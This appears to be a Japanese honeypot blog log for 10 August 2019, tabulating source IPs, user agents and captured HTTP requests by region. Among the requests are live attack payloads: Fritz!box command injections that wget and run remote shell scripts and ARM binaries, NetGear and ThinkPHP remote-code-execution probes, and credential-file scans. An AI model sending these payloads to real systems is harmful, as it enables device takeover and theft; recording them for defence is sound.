ハニーポット(仮) 観測記録 2019/08/10分です。

特徴

Region：AP

ThinkPHPの脆弱性を狙うアクセス
123[.]125[.]114[.]144に関する不正通信
を確認しました。

Region：US

AVM Fritz!boxの脆弱性を狙うアクセス
NetGearの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
masscanでのスキャン行為
awsのcredential情報に対するスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。

Region：EU

特にありませんでした。

他

アクセス数推移

AP：総アクセス数：49 (前日比：-3)
US：総アクセス数：30 (前日比：+13)
EU：総アクセス数：9 (前日比：-119)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	103.48.192.210	Vietnam
1	115.192.209.14	China
1	119.39.46.249	China
1	123.138.79.106	China
1	124.88.112.162	China
1	125.118.6.88	China
1	125.119.13.160	China
1	171.12.10.102	China
1	175.152.31.223	China
1	175.184.165.103	China
1	180.95.231.230	China
1	180.95.238.86	China
5	185.100.87.245	Romania
1	220.250.10.34	China
1	220.250.11.215	China
1	221.11.60.147	China
1	221.13.12.238	China
1	222.94.195.248	China
1	223.166.74.80	China
1	27.115.124.70	China
1	36.32.3.59	China
1	36.47.160.39	China
1	37.49.231.15	Estonia
1	39.98.213.1	China
2	41.216.186.87	South Africa
4	42.51.0.34	China
1	47.111.6.150	China
1	58.248.202.150	China
4	59.36.132.222	China
1	60.13.6.49	China
1	66.249.70.29	United States
3	77.247.110.69	Netherlands
1	84.147.60.170	Germany

UserAgent一覧

件数	UserAgent
6	-
2	curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2
2	Go-http-client/1.1
1	Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
1	Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302
1	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
13	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
5	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
7	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
6	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1	python-requests/2.21.0

リクエスト内容一覧

件数	Method	Request	Protocol
2	CONNECT	cn[.]bing[.]com:443	HTTP/1.1
4	CONNECT	www[.]baidu[.]com:443	HTTP/1.1
2	CONNECT	www[.]voanews[.]com:443	HTTP/1.1
1	GET	///admin/config.php	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
2	GET	http://boxun[.]com/	HTTP/1.1
2	GET	http://www[.]123cha[.]com/	HTTP/1.1
2	GET	http://www[.]baidu[.]com/	HTTP/1.1
2	GET	http://www[.]epochtimes[.]com/	HTTP/1.1
2	GET	http://www[.]ip[.]cn/	HTTP/1.1
1	GET	http://www[.]minghui[.]org/	HTTP/1.1
2	GET	http://www[.]rfa[.]org/english/	HTTP/1.1
2	GET	http://www[.]wujieliulan[.]com/	HTTP/1.1
1	GET	/nmaplowercheck1565349055	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/server-status	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
3	GET	/TP/public/index.php	HTTP/1.1
1	HEAD	/	HTTP/1.1
2	HEAD	http://123[.]125[.]114[.]144/	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
2	HEAD	/robots.txt	HTTP/1.1
1	POST	/sdk	HTTP/1.1
2	POST	/TP/index.php?s=captcha	HTTP/1.1
2	\x03
1	\x16\x03\x01

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	110.249.212.46	China
1	172.104.242.173	United States
10	180.96.12.158	China
10	183.131.18.172	China
1	193.169.60.41	Russia
1	211.38.144.230	South Korea
1	39.98.213.1	China
1	41.216.186.87	South Africa
1	77.247.110.69	Netherlands
2	89.248.174.144	Netherlands
1	91.121.209.213	France

UserAgent一覧

件数	UserAgent
7	-
2	Go-http-client/1.1
1	masscan/1.0 (https://github.com/robertdavidgraham/masscan)
1	Mozilla/5.0
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/.aws/credentials	HTTP/1.0
1	GET	/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26	HTTP/1.1
1	GET	/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F5[.]253[.]86[.]121%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
1	GET	http://110[.]249[.]212[.]46/testget?q=23333&port=80	HTTP/1.1
2	GET	/index.php	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
2	POST	/index.php?s=captcha	HTTP/1.1
1	\x03
1	\x16\x03\x01

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	158.69.192.200	Canada
1	162.247.74.217	United States
1	185.63.64.18	Switzerland
1	211.38.144.230	South Korea
1	41.216.186.87	South Africa
1	61.219.11.153	Taiwan
1	77.247.110.69	Netherlands

UserAgent一覧

件数	UserAgent
3	-
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0
1	Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0
1	Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB
1	Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
1	GET	/.git/index	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/.o3mJzT	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
1	\x03